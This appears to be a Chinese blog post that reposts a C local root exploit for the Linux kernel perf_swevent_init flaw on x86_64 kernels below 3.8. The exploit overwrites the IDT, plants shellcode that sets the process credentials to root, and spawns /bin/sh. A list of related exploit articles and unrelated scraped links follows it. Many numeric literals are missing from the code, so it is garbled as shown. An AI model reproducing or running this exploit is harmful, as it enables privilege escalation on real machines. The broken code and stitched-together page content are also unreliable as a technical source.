64位上编译

另外修改了原Exploit的一个错误

第76行
把     uint64_t *p = (void *) ¤t[i];
改成       uint64_t *p = (void *) &current[i];

*

* CVE-- exploit x86_64 Linux < 3.8.

* by sorbo (sorbo@darkircop.org) June

*

* Based on sd's exploit.  Supports more targets.

*

*/

#define _GNU_SOURCE

#include <string.h>

#include <stdio.h>

#include <unistd.h>

#include <stdlib.h>

#include <stdint.h>

#include <sys/syscall.h>

#include <sys/mman.h>

#include <linux/perf_event.h>

#include <signal.h>

#include <assert.h>

#define BASE        0x380000000

#define BASE_JUMP   0x1780000000

#define SIZE        0x10000000

#define KSIZE       0x2000000

#define TMP(x) (0xdeadbeef + (x))

struct idt {

    uint16_t limit;

    uint64_t addr;

} __attribute__((packed));

static int _fd;

static int perf_open(uint64_t off)

{

    struct perf_event_attr attr;

    int rc;

//  printf("perf open %lx [%d]\n", off, (int) off);

    memset(&attr, , sizeof(attr));

    attr.type           = PERF_TYPE_SOFTWARE;

    attr.size           = sizeof(attr);

    attr.config         = off;

    attr.mmap           = ;

    attr.comm           = ;

    attr.exclude_kernel = ;

    rc = syscall(SYS_perf_event_open, &attr, , -, -, );

    return rc;

}

void __sc_start(void);

void __sc_next(void);

void __sc(void)

{

    asm("__sc_start:\n"

        "call __sc_next\n"

        "iretq\n"

        "__sc_next:\n");

}

void sc(void)

{

    int i, j;

    uint8_t *current = *(uint8_t **)(((uint64_t) &i) & (-));

    uint64_t kbase = ((uint64_t)current) >> ;

    int uid = TMP();

    int gid = TMP();

    for (i = ; i < ; i += ) {

        uint64_t *p = (void *) &current[i];

        uint32_t *cred = (uint32_t*) p[];

        if ((p[] != p[]) || ((p[]>>) != kbase))

            continue;

        for (j = ; j < ; j++) {

            if (cred[j] == uid && cred[j + ] == gid) {

                for (i = ; i < ; i++) {

                    cred[j + i] = ;

                    return;

                }

            }

        }

    }

}

static void sc_replace(uint8_t *sc, uint32_t needle, uint32_t val)

{

    void *p;

    p = memmem(sc, , &needle, sizeof(needle));

    if (!p)

        errx(, "can't find %x", needle);

    memcpy(p, &val, sizeof(val));

}

static void *map_mem(uint64_t addr)

{

    void *p;

    p = mmap((void*) addr, SIZE, PROT_READ | PROT_WRITE,

         MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -, );

    if (p == MAP_FAILED)

        err(, "mmap()");

    return p;

}

static int find_mem(void *mem, uint8_t c)

{

    int i;

    uint8_t *p = mem;

    for (i = ; i < SIZE; i++) {

        if (p == c)

            return i;

    }

    return -;

}

static void dropshell()

{

    if (setuid() != )

        errx(, "failed");

    printf("Launching shell\n");

    execl("/bin/sh", "sh", NULL);

    exit();

}

void morte(int x)

{

    printf("Got signal\n");

    close(_fd);

    dropshell();

}

static void trigger(int intr)

{

    switch (intr) {

    case :

        do {

            int z = ;

            int a = ;

            z--;

            a /= z;

        } while ();

        break;

    case :

        asm("int $4");

        break;

    case 0x80:

        asm("int $0x80");

        break;

    default:

        errx(, "unknown intr %d", intr);

    }

    sleep();

}

int main(int argc, char *argv[])

{

    uint32_t *p[];

    int fd, i;

    uint64_t off;

    uint64_t addr = BASE;

    struct idt idt;

    uint8_t *kbase;

    int sz = ;

    int intr = ;

    printf("Searchin...\n");

    p[] = map_mem(BASE);

    p[] = map_mem(BASE_JUMP);

    memset(p[], 0x69, SIZE);

    off = 0xFFFFFFFFL;

    fd = perf_open(off);

    close(fd);

    i = find_mem(p[], 0xff);

    if (i == -) {

        i = find_mem(p[], 0x68);

        if (i == -)

            errx(, "Can't find overwrite");

        sz = ;

        addr = BASE_JUMP;

        printf("detected CONFIG_JUMP_LABEL\n");

    }

    munmap(p[], SIZE);

    munmap(p[], SIZE);

    addr += i;

    addr -= off * sz;

    printf("perf_swevent_enabled is at 0x%lx\n", addr);

    asm("sidt %0" : "=m" (idt));

    printf("IDT at 0x%lx\n", idt.addr);

    off = addr - idt.addr;

    off -= ;

    switch (off % sz) {

    case :

        intr = ;

        break;

    case :

        intr = 0x80;

        break;

    case :

        intr = ;

        break;

    default:

        errx(, "remainder %d", off % sz);

    }

    printf("Using interrupt %d\n", intr);

    off -=  * intr;

    assert((off % sz) == );

    off /= sz;

    off = -off;

//  printf("Offset %lx\n", off);

    kbase = (uint8_t*) (idt.addr & 0xFF000000);

    printf("Shellcode at %p\n", kbase);

    if (mmap(kbase, KSIZE, PROT_READ | PROT_WRITE | PROT_EXEC,

         MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -, ) == MAP_FAILED)

        err(, "mmap()");

    memset(kbase, 0x90, KSIZE);

    kbase += KSIZE - ;

    i = __sc_next - __sc_start;

    memcpy(kbase, __sc_start, i);

    kbase += i;

    memcpy(kbase, sc, );

    sc_replace(kbase, TMP(), getuid());

    sc_replace(kbase, TMP(), getgid());

    signal(SIGALRM, morte);

    alarm();

    printf("Triggering sploit\n");

    _fd = perf_open(off);

    trigger(intr);

    exit();

}

Linux kernel perf_swevent_init Local root Exploit的更多相关文章

  1. [轉]Linux kernel <2.6.29 exit_notify() local root exploit分析(2009-1337)

    author : deep_pro目前网上的这个exploit(http://www.milw0rm.com/exploits/8369)的分析是有些问题的(http://forum.evilocta ...

  2. [轉]Exploit Linux Kernel Slub Overflow

    Exploit Linux Kernel Slub Overflow By wzt 一.前言 最近几年关于kernel exploit的研究比较热门,常见的内核提权漏洞大致可以分为几类: 空指针引用, ...

  3. karottc A Simple linux-virus Analysis、Linux Kernel <= 2.6.37 - Local Privilege Escalation、CVE-2010-4258、CVE-2010-3849、CVE-2010-3850

    catalog . 程序功能概述 . 感染文件 . 前置知识 . 获取ROOT权限: Linux Kernel <= - Local Privilege Escalation 1. 程序功能概述 ...

  4. Android linux kernel privilege escalation vulnerability and exploit (CVE-2014-4322)

    In this blog post we'll go over a Linux kernel privilege escalation vulnerability I discovered which ...

  5. [轉]Exploit The Linux Kernel NULL Pointer Dereference

    Exploit The Linux Kernel NULL Pointer Dereference Author: wztHome: http://hi.baidu.com/wzt85date: 20 ...

  6. CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC

    /**  * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC  *  * Vitaly Nikolenko  * http://ha ...

  7. ANALYSIS AND EXPLOITATION OF A LINUX KERNEL VULNERABILITY (CVE-2016-0728)

    ANALYSIS AND EXPLOITATION OF A LINUX KERNEL VULNERABILITY (CVE-2016-0728) By Perception Point Resear ...

  8. archlinux 传统方法编译内核linux kernel 3.3.7

    From: http://hi.baidu.com/flashgive/item/eaef6326b5eb73d3a417b662 archlinux中传统方法编译内核 1)下载内核以及补丁并解压: ...

  9. the Linux Kernel: Traffic Control, Shaping and QoS

    −Table of Contents Journey to the Center of the Linux Kernel: Traffic Control, Shaping and QoS 1 Int ...

随机推荐

  1. Java构造方法的含义和使用

    我们实例化对象时,一般使用"类名 对象名 = new 类名()"来实例化,其实这样并不是十分严谨,只是编译器帮我们自动补全了一个空的构造方法,当实例化对象时,构造方法会被自动调用, ...

  2. Heap:Sunscreen(POJ 3614)

    晒太阳 题目大意:一堆牛,为了避免晒太阳会灼烧自己,然后他们自己有自己的防晒指数(一个区间),防晒霜可以提高防晒因数SPF,大了不行小了不行,现在有一桶防晒霜,他们提供一定的SPF,但是最多可以提供k ...

  3. 【VirtualBox】端口转发,ssh

    端口转发 VirualBox的设置 - 网络 - 端口转发 里面有主机IP.主机端口.子系统IP.子系统端口 设置后的含义是:当外部访问主机IP:主机端口后,将会把访问映射到虚拟机的子系统IP和子系统 ...

  4. C语言字符串处理

    一. C语言中,为什么字符串可以赋值给字符指针变量 char *p,a='5';p=&a;                     //显然是正确的,p="abcd";   ...

  5. July 17th, Week 30th Sunday, 2016

    You are beautiful, but that is not why I love you. 你如此美丽,但我并非因此而爱你. Although we have always been tol ...

  6. CUDA学习笔记(三)——CUDA内存

    转自:http://blog.sina.com.cn/s/blog_48b9e1f90100fm5f.html 结合lec07_intro_cuda.pptx学习 内存类型 CGMA: Compute ...

  7. django默认开事务的麻烦事

    最近DBA发现总是有大事务报警,最终排查到是因为django默认在查询之前执行了 set autocommit=0 原来,mysql如果开了set autocommit=0,那么所有的语句一定是在一个 ...

  8. DataSet与Xml文件的互相转换

    DataSet转换为xml文件   //将DataSet转换为xml文件        private static void ConvertDataSetToXMLFile(DataSet xmlD ...

  9. vim 多窗口

    打开多个文件: 1.vim还没有启动的时候: 在终端里输入 vim file1 file2 ... filen便可以打开所有想要打开的文件 2.vim已经启动 输入 :open file 可以再打开一 ...

  10. JSP Servlet 路径解析 路径设置

    转自:http://ethen.iteye.com/blog/800415 在用JSP和Servlet编写Web应用时,经常遇到的问题就是找不到.do路径,或者.do路径不能解析,其实归根到底就是Se ...